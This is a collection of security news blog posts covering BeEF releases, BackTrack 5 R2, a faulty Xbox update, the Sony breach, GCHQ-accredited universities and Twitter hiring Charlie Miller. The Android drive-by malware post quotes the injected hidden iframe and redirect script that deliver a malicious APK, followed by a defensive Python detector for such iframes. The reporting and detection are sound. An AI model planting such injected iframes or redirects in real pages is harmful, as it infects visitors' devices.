
BeEF v0.4.2.8 (Alpha)


BeEF, the Browser Exploitation Framework, is a professional security tool provided for lawful research and testing purposes. It gives the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF controls which browser will launch which exploit and at which target.
BeEF hooks one or more web browsers as beachheads for the launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals. BeEF provides an easily integrated framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.

This release contains support for the XssRays extension, which is still in the pilot stage and will be improved further in the next release. The framework now loads faster because modules are loaded dynamically. The core enhancements have had a great impact on command module navigation, which should be quite noticeable.
Unfortunately, this release also has a bug that prevents MSF from interacting with BeEF. The author mentions that this will be taken care of pretty soon. Until then, it is recommended that the latest version be downloaded via the SVN repository.

Download BeEF v0.4.2.8-alpha here.


BeEF v0.4.2.6-alpha


BeEF, the Browser Exploitation Framework, is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target.
BeEF hooks one or more web browsers as beachheads for the launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals. BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.

This release adds a new ColdFusion directory traversal exploit. When this module is launched, the attack will appear to originate from the hooked browser. Also, a new ‘Detect Social Networks’ module was implemented! This will determine if the hooked browser is logged into Facebook, GMail or Twitter! Looks like an awesome release! Keep up the good work guys!


Download BeEF v0.4.2.6-alpha (beef-latest-alpha.tar.gz/0.4.2.6alpha.zip) here.


Microsoft fixed faulty Xbox 360 update by giving free console


Console gamers just can’t catch a break with the video game gods. This time, it is Xbox 360 gamers who can’t play their games. Some Xbox 360 owners are finding a “disk unreadable” or “disk unsupported” error after updating their consoles with the most recent update, where the only fix is to have their consoles replaced, according to TG Daily.

At least Microsoft is proactively seeking out affected customers through Xbox LIVE and offering them a new Xbox 360 S (250 GB) plus a one-year free subscription to Xbox LIVE. Kotaku reports that Xbox gamer Avery Penn found out his console is eligible for a new one by email before his DVD drive failed and could no longer load his games. His 360 60GB Pro was bought in 2009 and has a LiteOn DVD drive. Microsoft is certainly learning from Sony’s recent troubles with disgruntled gamers who were locked out of the PSN for nearly a month.

According to Kotaku, this update “reflashes the DVD drive to a new stock firmware, and adds support for new XGD3 disk format. It’s this update that allows an extra GB of usable storage on game discs.” Eurogamer’s Digital Foundry blog believes Microsoft is not just being altruistic in offering customers new consoles: the new update is supposed to beef up the console’s ability to detect pirated disks/non-retail disks and prevent them from playing the full game in the future.

If your 360 is affected by the firmware update, contact Xbox Support here or DM XboxSupport on Twitter for assistance. Unfortunately, there is no comprehensive list available to check the impact the update may have on your console before you install it. Microsoft did acknowledge the problem “is not specific to older or newer versions of Xbox 360” so there is only one way to find out. Good luck! (Note: This problematic update is not the upcoming one that will allow Xbox LIVE customers to purchase content through their PayPal accounts.)


Hacked Sites Infecting Android Mobiles With "drive-by" Malware


Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: when someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in an iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security's official blog post:
How it Works:
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details:
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here
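For site owners checking their own pages for this kind of injection, the following is an added example (not from Lookout's post or this blog) that flags iframes which are both invisible and loaded from a host outside the site. The function names and the `.example` hostnames in the constructed sample page are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def parse_style(style):
    # Turn an inline style string into {property: value}, lower-cased.
    decls = {}
    for part in style.split(";"):
        prop, sep, value = part.partition(":")
        if sep:
            decls[prop.strip().lower()] = value.strip().lower()
    return decls

def is_hidden(attrs):
    # True when the iframe's own attributes make it invisible to a visitor.
    style = parse_style(attrs.get("style") or "")
    zero = {"0", "0px"}
    if style.get("display") == "none" or style.get("visibility") == "hidden":
        return True
    if style.get("width") in zero or style.get("height") in zero:
        return True
    return attrs.get("width") in zero or attrs.get("height") in zero or "hidden" in attrs

class IframeAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attrs = dict(attrs)
        host = (urlparse(attrs.get("src") or "").hostname or "").lower()
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        if host and not same_site and is_hidden(attrs):
            line, _ = self.getpos()  # line where the <iframe tag starts
            self.findings.append({"line": line, "host": host, "src": attrs["src"]})

def audit_page(html, site_host):
    # Return one finding per hidden iframe whose src is off-site.
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample: two legitimate same-site frames and one injected frame.
SAMPLE_PAGE = """<html><body>
<iframe src="https://www.shop.example/widgets/cart" width="300" height="200"></iframe>
<iframe style="display: none" src="https://cdn.shop.example/pixel"></iframe>
<h1>Shop</h1>
<iframe
style="visibility: hidden; display: none; display: none;"
src="http://stats.injected.example/?id={0000}"></iframe>
</body></html>"""
```

Because the redirect described above is only served to Android user agents, a scan of the stored page source like this one is more reliable than fetching the page with a desktop browser and looking for odd behaviour.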





Twitter Hires Renowned Apple Hacker Charlie Miller For Twitter Security Team



It is an almost impossible task for social networks to keep everything safe against hacks and other vulnerabilities. Hackers will constantly find their way around anything that you put in place. So they often deal with hackers and turn to them to beef up their security level. Social networking giant Twitter did exactly that. The micro-blogging network has hired the famous/infamous Apple hacker, Charlie Miller, to be a part of its security team. Charlie Miller, a popular figure among hackers, broke the news via his Twitter account, saying, “Monday I start on the security team at Twitter. Looking forward to working with a great team there!” Twitter issued a short statement noting that Miller’s title will be that of Software Engineer, but declined to discuss any further details.
Charlie Miller has a background as a Global Exploitation Analyst at the National Security Agency, and has hacked devices running iOS, OS X, and Android. He is considered to be a white-hat hacker, which means that he hacks to expose vulnerabilities in a system in order to have those weaknesses fixed. Five years ago, Miller was said to be the first to hack the iPhone using the device’s browser, exposing the handset’s vulnerability to security attacks. Several months after this, he was likewise able to hack a MacBook Air in just two minutes. This feat allowed Miller to win the Pwn2Own hacking competition. Miller also showed a way to hijack iPhones through SMS in 2009. In 2011, he used the MacBook power adapter to implant malware on the laptop. In the same year, his license as an Apple developer was revoked because Apple found that he had breached the development agreement.
In more recent times, Miller had been working on Android devices. In June, he was able to overcome Bouncer, Google’s security program. He also has experience in using Near Field Communications to control Samsung and Nokia handsets with a simple wave of another phone that is within the vicinity.
While talking about Charlie Miller, we must also mention another name: Nicholas Allegra, the world-famous hacker known as "Comex", creator of JailbreakMe.com, who was later hired by Apple itself. As for Twitter, apart from Miller, it also hired Moxie Marlinspike, a hacker who specializes in SSL and VPN encryption.








BackTrack 5 R2 (Penetration Testing Distribution) Released With Kernel 3.2.6 & 42 New Tools


The developers of BackTrack, the world's most widely used penetration testing distribution, have officially announced the full release of BackTrack 5 R2. With this release they have closed several bugs, upgraded tools, and added 42 new tools. BT 5 R2 runs a custom-built 3.2.6 kernel with the best wireless support available. The developers have also claimed that this is the fastest and best release of BackTrack yet. In BackTrack 5 R2 you will find Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades too numerous to mention.

Newly Added Tools in BackTrack 5 R2:
arduino, bluelog, bt-audit, dirb, dnschef, dpscan, easy-creds, extundelete, findmyhash, golismero, goofile, hashcat-gui, hash-identifier, hexorbase, horst, hotpatch, joomscan, killerbee, libhijack, magictree, nipper-ng, patator, pipal, pyrit, reaver, rebind, rec-studio, redfang, se-toolkit, sqlsus, sslyze, sucrack, thc-ssl-dos, tlssled, uniscan, vega, watobo, wce, wol-e, xspy
The rest of the information can be found on the BT Wiki page. To download BackTrack 5 R2 Click Here. If you are already using BT, you can upgrade your version by following the steps below.
echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade






GCHQ Awarded 8 UK Universities “Academic Centre of Excellence in Cyber Security Research”

The UK is putting more attention on cyber-security. Last Monday GCHQ, the UK's signals intelligence organisation, awarded eight UK universities the 'Academic Centre of Excellence in Cyber Security Research', laying the ground for deeper relationships between the institutions and the government agency. These top eight UK universities will work closely with GCHQ as centres of excellence for cybersecurity research.
According to the official GCHQ release:
The first eight UK universities conducting world class research in the field of cyber security have been awarded “Academic Centre of Excellence in Cyber Security Research” status by GCHQ in partnership with the Research Councils’ Global Uncertainties Programme (RCUK) and the Department for Business Innovation and Skills (BIS). We hope other universities will also become Centres in the near future as part of an ongoing process.
The Centres of Excellence will benefit the UK by:
  • Enhancing the UK’s cyber knowledge base through original research
  • Providing top quality graduates in the field of cyber security
  • Supporting GCHQ’s cyber defence mission
  • Driving up the level of innovation
  • The Centres of Excellence will help make the UK government, business and consumers more resilient to cyber attack by extending knowledge and enhancing skills in cyber security.
The eight Universities chosen as Centres of Excellence in Cyber Security Research are:
  • University of Bristol    
  • Imperial College London
  • Lancaster University    
  • University of Oxford
  • Queen’s University Belfast    
  • Royal Holloway, University of London
  • University of Southampton    
  • University College London
These Centers will be the first to attain Academic Centre of Excellence in Cyber Security Research status and will benefit from:
  • Closer collaboration with GCHQ, the UK Cyber Community and industry
  • Partnership endorsement in associated publications and prospectuses
  • Better understanding of Government and industrial cyber issues
  • Helping to formulate the future Cyber Security research agenda
  • Extra funding opportunities and £50,000 capital investment
Francis Maude, the minister for cybersecurity, said, "These first eight centers will play a vital role in boosting research, expanding our cyber skills base and fostering innovation in the field." He added, "We want to make the UK one of the most secure places in the world to do business, by investing in the best expertise to keep pace with technological change." The centres will open for business on 1 July 2012 for five years, during which time GCHQ hopes other universities will beef up their cybersecurity capabilities to meet the criteria for being recognised as centres of excellence.


-Source (GCHQ)




Sony says 25 million more accounts hacked




Sony Corp. said Monday that hackers may have taken personal information from an additional 24.6 million user accounts after a review of the recent PlayStation Network breach found an intrusion at a division that makes multiplayer online games.

The data breach comes on top of the 77 million PlayStation accounts it has already said were jeopardized by a malicious intrusion.

The latest incident occurred April 16 and 17 - earlier than the PlayStation break-in, which occurred from April 17 to 19, Sony said.

About 23,400 financial records from an outdated 2007 database involving people outside the U.S. may have been stolen in the newly discovered breach, including 10,700 direct debit records of customers in Austria, Germany, the Netherlands and Spain, it said.

The outdated information contained credit card numbers, debit card numbers and expiration dates, but not the 3-digit security code on the back of credit cards. The direct debit records included bank account numbers, customer names, account names and customer addresses.

Company spokeswoman Taina Rodriguez said Sony had no evidence the information taken from Sony Online Entertainment, or SOE, was used illicitly for financial gain.

"We had previously believed that SOE customer data had not been obtained in the cyber-attacks on the company, but on May 1 we concluded that SOE account information may have been stolen and we are notifying you as soon as possible," Sony said in a message to customers.

Sony said that it shut service Monday morning to Sony Online Entertainment games, which are available on personal computers, Facebook and the PlayStation 3 console. Its most popular games include "EverQuest," "Free Realms" and "DC Universe Online."

The company said it will grant players 30 days of additional time on their subscriptions, along with one day for each day the system is down. It is also creating a "make good" plan for its multiplayer online games.

On Sunday, Sony executives bowed in apology and said they would beef up security measures after an earlier breach caused it to shut down its PlayStation network on April 20. The company is working with the FBI and other authorities to investigate what it called "a criminal cyber attack" on Sony's data center in San Diego, Calif.

The company said it would offer "welcome back" freebies such as complimentary downloads and 30 days of free service to PlayStation customers around the world to show remorse and appreciation.

PlayStation spokesman Patrick Seybold, in a blog post Monday, denied a report that said a group tried to sell millions of credit card numbers back to Sony.

He also said that while user passwords had not been encrypted, they were transformed using a simpler function called a hash that did not leave them exposed as clear text.
